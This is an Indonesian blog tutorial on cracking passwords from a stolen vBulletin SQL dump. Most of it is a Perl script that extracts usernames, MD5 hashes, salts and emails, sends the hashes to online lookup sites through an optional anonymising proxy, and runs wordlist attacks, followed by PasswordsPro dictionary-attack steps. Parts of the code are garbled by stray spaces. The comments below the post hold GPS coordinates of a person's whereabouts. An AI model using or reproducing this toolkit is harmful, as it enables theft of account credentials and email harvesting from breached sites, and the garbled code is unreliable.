Selasa, 24 September 2013

Cracking Sql Database

Published : 08.39 Author :
Jadi, Broe memiliki "memperoleh" database dari beberapa macam, dan Broe ingin mengambil password dari itu. Dalam tutorial ini, kita akan berasumsi bahwa MD5 password terenkripsi, dan ini adalah database vbull

Pertama, Broe perlu untuk mengekstrak usernames/MD5/salts/emails dari database. Ane akan terus maju dan menganggap karena Broe VIP, Broe sudah memiliki perl aktif terinstal, dan mengerti bagaimana menjalankan perl eksploitasi / scripts. Kita akan menggunakan skrip perl untuk mengekstrak dari hal-hal ini. Sql file.




Qute :

#!/usr/bin/perl
use strict;
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
my $ua = LWP::UserAgent->new(agent=>'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.5');
push @{$ua->requests_redirectable}, "POST";
my $proxy = ""; #Slip a lil CGI proxy like anonymouse in here if you want for the md5 lookups
#email regex stolen from regexp to only allow for formally valid email addresses
sub tchomp { #From the module Text::Chomp
my $text = shift;
$text =~ s/^(.*?)(?:\x0D\x0A|\x0A|\x0D|\x0C|\x{2028}|\x{2029} )/$1/s;
return $text;
}

sub getreq($){
my($url,$request,$myrequest);
$url = $_[0];
$request = HTTP::Request->new(GET => $url);
$myrequest = $ua->request($request);
if($myrequest->is_success){
return $myrequest->content;
}
else{
print "\n[e] Connection error - " . $myrequest->status_line . "\n";
return 0;
}
}

sub postreq($$){
my($url,$postcontent,$request,$myrequest);
$url = $_[0];
$postcontent = $_[1];
$request = HTTP::Request->new(POST => $url);
$request->content_length(length($postcontent));
$request->content_type('application/x-www-form-urlencoded');
$request->content($postcontent);
$myrequest = $ua->request($request);
if($myrequest->is_success){
return $myrequest->content;
}
else{
print "\n[e] Connection error - " . $myrequest->status_line . "\n";
return 0;
}
}


sub getcracked($){
my($hash,$cracked,%h_sites,%h_regexes,$key,$conten t);
$hash = $_[0];
$cracked = 0;
$h_sites{"alimamed.pp.ru"} = "md5/?md5e=&md5d=$hash";
$h_sites{"md5.rednoize.com"} = "?p&s=md5&q=$hash";
$h_sites{"gdataonline.com"} = "qkhash.php?mode=txt&hash=$hash";
$h_sites{"ice.breaker.free.fr"} = "md5.php?hash=$hash";
$h_sites{"md5.xpzone.de"} = "?string=$hash&mode=decrypt";
$h_sites{"us.md5.crysm.net"} = "find?md5=$hash";
$h_regexes{"alimamed.pp.ru"} = "<b>(.+)<\/b><br>";
$h_regexes{"md5.rednoize.com"} = "(.+)";
$h_regexes{"gdataonline.com"} = "<b>(.+)<\/b><\/td><\/tr>";
$h_regexes{"ice.breaker.free.fr"} = "<b><br><br> - (.+)<br><br><br>";
$h_regexes{"md5.xpzone.de"} = "Code: <b>(.+)<\/b><br>";
$h_regexes{"us.md5.crysm.net"} = "<li>(.+)</li><li></li>";
foreach $key(keys %h_sites){
print "[+] CHECKING\tSITE: $key\n";
if($cracked==1){
last;
}
else{
$content = &getreq($proxy."http://$key/$h_sites{$key}");
if($content =~ m/$h_regexes{$key}/i){
if(md5_hex($1) eq $hash){
print "[+] Found match $hash - $1\n\n";
return $1;
$cracked=1;
}
}
}
}
if($cracked==0){
return &postcracked($hash);
}
}

sub postcracked{
my($hash,$cracked,%h_sites,$key,$content,$con,$fha sh,%h_regexes,%h_posts);
$hash = $_[0];
$cracked = 0;
$h_sites{"hashkiller.com/crack/"}="md5_crack=$hash&submit=Crack";
$h_sites{"milw0rm.com/cracker/search.php"} = "hash=$hash&Submit=Submit";
$h_sites{"md5decrypter.com/"} = "hash=$hash&submit=Decrypt%21";
$h_sites{"hashreverse.com/index.php?action=view"} = "hash=$hash&Submit2=Search+for+a+SHA1+or+MD5+h ash" ;
$h_sites{"securitystats.com/tools/hashcrack.php"} = "inputhash=$hash&type=MD5&Submit=Submit";
$h_sites{"hashchecker.com/index.php"} = "search_field=$hash&Submit=search";
$h_sites{"md5crack.it-helpnet.de/index.php?op=search"} = "md5=$hash";
$h_regexes{"hashkillmy er.com/crack/"} = "<legend>Password:<\/legend>\n(.+)<br>";
$h_regexes{"milw0rm.com/cracker/search.php"} = "<TR class=\"submit\"><TD align=\"middle\" nowrap=\"nowrap\" width=90>md5<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=250>$hash<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>(.*?)<\/TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked<\/TD><\/TR>";
$h_regexes{"md5decrypter.com/"} = "<b class='red'>Normal Text: <\/b>(.*?)\n<br\/><br\/>";
$h_regexes{"hashreverse.com/index.php?action=view"} = "Following results were found:<br><ul><li>(.*?)<\/li><\/ul>";
$h_regexes{"securitystats.com/tools/hashcrack.php"} = "<BR>$hash = (.*?)<\/td>";
$h_regexes{"hashchecker.com/index.php"} = "<li>$hash is <b>(.*?)<\/b>";
$h_regexes{"md5crack.it-helpnet.de/index.php?op=search"} = "<td>$hash<\/td><td>(.*?)<\/td><\/tr><\/table>";
foreach $key(keys %h_sites){
if($cracked==1){
last;
}
else{
print "[+] CHECKING\tSITE: $key\n";
$content = &postreq($proxy."http://$key",$h_sites{$key});
if($content =~ m/$h_regexes{$key}/i){
$fhash = $1;
if(md5_hex($fhash) eq $hash){
print "[+] Found match $hash - $fhash\n\n";
return $fhash;
$cracked=1;
}
}
}
}
if($cracked==0){
return 0;
}
}

sub e{
print "
Email extractor\t\t -E
Arguments:
<File>\tFile you want emails from
<File>\tFile to dump the emails to
E.G.: DbCrackingKit.pl -E dump-gamers.sql gamers-emails.txt
------------------------------------------------------------------------\n";
}

sub h{
print "
MD5 lookups\t\t -H
Arguments:
<File>\tFile of whatever:hashes (username:email:whatever:HASH)
<File>\tFile to dump cracked hashes to
<File>\tFile to dump uncracked hashes to, for further cracking with other wordlists/methods
E.G.: DbCrackingKit.pl -H gamerdump.txt gamer-cracked.txt gamer-uncracked.txt
------------------------------------------------------------------------\n";
}

sub d{
print "
Database extractor\t -D
Arguments:
<database>\tDumped database
<prefix>\tPrefix of the table you\'re extracting from
<columns>\tNumbers of the columns you want, seperate by commas
<delimiter>\tWhat to split the resulting data by.
\t\tIf you want spaces then enclose with quotes
<resultfile>\tFile to dump the extracted data to\n
E.G.: DbCrackingKit.pl -D dump-gamers.sql e107-users 2,5 : gamerdump.txt
------------------------------------------------------------------------\n";
}

sub w{
print "
MD5 wordlist cracker\t -W
Arguments:
<File>\tFile of whatever:hashes (e.g username:email:password:HASH)
<File>\tWordlist to crack with
<File>\tFile to dump cracked hashes
<File>\tFile to dump uncracked hashes, for further cracking
E.G.: DbCrackingKit.pl -W gamerdump.txt mil-dic.txt gamer_cracked.txt gamer_uncracked.txt
------------------------------------------------------------------------\n";
}

if($ARGV[0] eq "-D"){
&d;exit unless @ARGV==6;
my($sir,$db_database,$db_prefix,$db_columns,$db_de lim,$db_dump,@db_full,@db_columns,@db_columndata,$ line,$d,$x,$realnum) = (@ARGV);
@db_columns = split(/,/,$db_columns);
print "Db: $db_database\nPrefix: $db_prefix\nColumns: $db_columns\nDelimiter: $db_delim\nResult: $db_dump\n";
print "[+] Just wait, loading $db_database";
open("xfile", "<$db_database") || die "Couldn\'t open $db_database\n";
@db_full = <xfile>;
close("xfile");
print " - finished\n";
foreach $line(@db_full){
$line = &tchomp($line);
if($line =~ s/INSERT INTO (\'|\`|)$db_prefix(\'|\`|)(.+)/INSERT INTO \`$db_prefix\`$3/i){
@db_columndata = split(/\'/,$line);
$d=1;
open(DBLOG,">>$db_dump") || die "[-] Couldn't open $db_dump\n";
for($x=0;$x<=$#db_columns;$x++){
$realnum = $db_columns[$x]*2-1;
if($x==$#db_columns){
print "$db_columndata[$realnum]\n";
print DBLOG "$db_columndata[$realnum]\n";
}
else{
print "$db_columndata[$realnum]$db_delim";
print DBLOG "$db_columndata[$realnum]$db_delim";
}
}
}
}
close(DBLOG);
if($d){
print "[+] Parsing & dumping completed\n";
}
else{
print "[-] No data was extracted\n";
}
}
elsif($ARGV[0] eq "-E"){
&e;exit unless @ARGV==3;
my($sir,$efile,$edump,$line,@emails) = (@ARGV);
print "[+] Extracting emails from $efile\n";
open("xfile", "<$efile") || die "Couldn't open $efile\n";
while($line = <xfile>){
$line = &tchomp($line);
open(ELOG,">>$edump") || die "[-] Couldn't open $edump\n";
while($line=~m/([a-z_\-.0-9]+@[a-z_\-.0-9]+)/ig){
print "[E] $1\n";
print ELOG "$1\n";
}
}
close("xfile");
close(ELOG);
}
elsif($ARGV[0] eq "-H"){
&h;exit unless @ARGV==4;
my($sir,$hashes,$dump,$uncracked,$c,$u,$line,$crac ky,$hashn) = (@ARGV);
$c=0;
$u=0;
open("xfile", $hashes) || die "Couldn't open $hashes\n";
while($line = <xfile>){
$line = &tchomp($line);
if($line =~ m/^(.+)[a-f0-9]{32})$/i){
$hashn++;
print "[+] Attempting lookup on $2\n";
$cracky = &getcracked($2);
if($cracky){
$c++;
open(LOG,">>$dump") || die("Couldn't open $dump\n");
print LOG "$1:$cracky\n";
close(LOG);
}
else{
$u++;
print "[-] Didn't find match\n";
open(LOG,">>$uncracked") || die("Couldn't open $uncracked\n");
print LOG "$line\n";
close(LOG);
}
}
else{
print "[-] $line doesn't match whatever:md5\n";
}
}
close("xfile");
if($hashn){
print "\n########################################### #### ##############\n";
print "[+] Statistics:\n\t[+] Hashes attempted: $hashn\n";
print "\t[+] Hashes cracked: $c - " . int($c/$hashn*100+(.5)) . "%\n";
print "\t[+] Hashes not cracked: $u - " . int($u/$hashn*100+(.5)) ."%\n";
print "############################################# #### ################\n";
}
}
elsif($ARGV[0] eq "-W"){
&w;exit unless @ARGV==5;
my($sir,$hashesl,$wordlist,$crackedl,$uncrackedl,$ c,$hashn,$line,$whatever,$hash,$word,$cracked) = (@ARGV);
$c=0;
open("userfile", $hashesl) || die("Couldn't open $hashesl\n");
while($line = <userfile>){
$line = &tchomp($line);
if($line =~ m/^(.+)[a-f0-9]{32})$/i){
$cracked=0;
$whatever = $1;
$hash = $2;
$hashn++;
print "[+] Attempting $hash\n";
open("wordlist",$wordlist) || die("Couldn't open $wordlist\n");
while($word = <wordlist>){
$word = &tchomp($word);
if(md5_hex($word) eq $hash){
print "[+] Cracked - " . md5_hex($word) . " : $word\n";
open(LOG,">>$crackedl") || die("Couldn't open $crackedl\n");
print LOG "$whatever:$word\n";
close(LOG);
$cracked=1;
$c++;
last;
}
}
close("wordlist");
if($cracked==0){
open(LOG,">>$uncrackedl") || die("Couldn't open $uncrackedl\n");
print LOG "$line\n";
close(LOG);
}
}
}
close("userfile");
if($hashn){
print "\n########################################### #### ##############\n";
print "[+] Statistics:\n\t[+] Hashes attempted: $hashn\n";
print "\t[+] Hashes cracked: $c - " . int($c/$hashn*100+(.5)) . "%\n";
print "\t[+] Hashes not cracked: " . ($hashn-$c) . " - " . int(($hashn-$c)/$hashn*100+(.5)) ."%\n";
print "############################################# #### ############\n";
}
}
else{
&d;&e;&h;&w;exit;




Untuk menggunakan skrip, simpan skrip sebagai. Pl file dalam C: \ Perl \ bin (sebagai database.pl), dan memindahkan database ke direktori tersebut juga. Buka command prompt, ketik cd c: \ perl \ bin, lalu ketik nama script, database.pl. Ini akan menunjukkan kepadaBroe bagaimana menggunakan script. Kita akan menggunakan saklar-D.

Sebuah contoh dari seluruh perintah yang Anda masukkan akan mungkin ..


Qoute :

database.pl -D yourdatabase.sql vbul_users 7,47,4,9 : dumped.txt

or basically

Code:
script name.pl -D <database> <prefix of the tables your extracting from> <numbers of the columns you want> <delimiter (what seporates them in the resulting file)> <resulting file>


Jadi, sekarang Broe harus memiliki dump.txt. Buka file dibuang dan pastikan itu tampak seperti username: MD5: garam: email. Sekali Broe telah menegaskan hal ini, Broe siap untuk impor ini ke perangkat lunak retak yang sebenarnya. Hari ini kita akan menggunakan password pro. untuk password pro cari sendiri di mbah google.

setelah mendownload silakan diekstrak, dan membuka program. Sekarang kita perlu mengimpor hashing modul. Pergi untuk melayani -> pilihan -> hashing modul -> (klik kanan) Tambahkan .. -> Kemudian cari \ passwordspro \ Modul direktori dan menyoroti semua modul dan klik terbuka. Kembali ke pilihan, klik Dictionarys, dan mengimpor dengan cara yang sama Broe melakukan modul, tetapi dari \ passwordspro \ Kamus direktori. (Kamu dapat menempatkan daftar sandi Kamu sendiri di lokasi ini dan impor mereka juga).

Sekarang pergilah file -> import -> dan menemukan. Txt dump Kamu buat sebelumnya. Kemudian Kamu akan ditanyakan jenis hash apa yang terkandung dalam file tersebut. Jika ini merupakan vbull database, pilih md5 ($ pass. $ Garam) [PHP]. Setelah dimuat Kamu siap untuk memulai serangan kamus MD5's. Jika Broe tidak berencana cracking selamanya, Ane sarankan Kamu menyimpan sekarang karena itu akan lebih cepat untuk membuka. Hash file kemudian daripada untuk mengimpor database lagi. Sekarang untuk Audit -> Wikipedia Dictionary Attack lalu Audit -> Mulai serangan dan menonton seperti berjalan melalui dictionarys Kamu, menciptakan sebuah md5 dari password di kamus, dan membandingkan ke md5 Kamu telah dimasukkan ke PWP. Jika mereka cocok, Kamu telah memecahkan sandi! Bila Broe bosan retak, menghentikan serangan, dan simpan. Lalu pergi File -> export -> dan output file teks password yang retak. 
Label: |

3 komentar:

  1. SALOME PORTAL11 November 2018 pukul 23.25

    Hubungi ponsel pada file ••••-••••-••16
    Tidak tersedia karena sudah terlalu sering dicoba. Harap coba lagi nanti.
    Konfirmasi nomor telepon pemulihan
    Dapatkan bantuan
    BantuanPrivasiPersyaratan

    BalasHapus
  2. SALOME PORTAL12 November 2018 pukul 01.13

    ini posisi kordinat nya 2°33'33.9"S 120°48'41.3"E
    -2.559423, 120.811468

    BalasHapus
  3. SALOME PORTAL12 November 2018 pukul 06.49

    INI LETAK SEKARANG NYA ITU BARANG MALAM INI 2°41'58.6"S 121°08'27.0"E
    -2.699599, 121.140840

    BalasHapus

Langganan: Posting Komentar (Atom)